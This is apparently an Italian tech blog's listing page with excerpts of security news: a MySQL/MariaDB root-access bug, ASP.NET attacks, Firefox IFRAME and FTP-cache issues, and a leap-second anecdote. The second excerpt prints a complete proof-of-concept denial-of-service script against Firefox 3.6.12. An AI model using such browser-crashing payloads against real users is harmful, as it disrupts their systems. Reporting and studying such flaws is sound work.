È stato scoperto un pericoloso baco in MySQL/MariaDB che potrebbe permettere l’accesso come root ad un database server. La vulnerabilità non funziona su tutte le installazioni di MySQL (inclusa CentOS) e dipende da come è stato compilato il server. Il problema risiede […] ↓ Read the rest of this entry…
<!– 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele ‘emgent’ Gentili <emgent@backtrack-linux.org> Marco ‘white_sheep’ Rondini <white_sheep@backtrack-linux.org> Alessandro ‘scox’ Scoscia <scox@backtrack.it> –> <script>document.write(“\u0000\u0001\u0002\u0003\u0004\u0005″)</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write(“a”); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script> Il […] ↓ Read the rest of this entry…
In mancanza di altri programmi i browser possono essere utilizzate anche come client FTP. Per collegarsi, ad esempio, a mail.siamogeek.com con l’utente utente e la password segreta si può digitare questo URL: ftp://utente:segreta@mail.siamogeek.com Purtroppo Firefox registra questo URL nella cache, […] ↓ Read the rest of this entry…
Contrariamente a quanto riportato da Microsoft, sembra che gli attacchi che sfruttano la vulnerabilità di ASP.NET siano non solo fattibili, come mostra il video qui sopra, ma anche in corso. La situazione sembra seria e chi amministra un sito esposto […] ↓ Read the rest of this entry…
31 Dicembre 2008 23:59:58 31 Dicembre 2008 23:59:59 31 Dicembre 2008 23:59:60 1 Gennaio 2009 00:00:00 1 Gennaio 2009 00:00:01 Errore? No, è esattamente quello che è successo quella notte a causa dell’introduzione del secondo intercalare (leap second in inglese).
Treatpost segnala un problema di sicurezza che interessa tutte le versioni di Firefox scoperto da Armorize. Il browser non controlla gli indirizzi offuscati a cui si accede attraverso IFRAME, permettendo ad un attaccante di confondere o nascondere l’indirizzo del sito […] ↓ Read the rest of this entry…
Ultimi commenti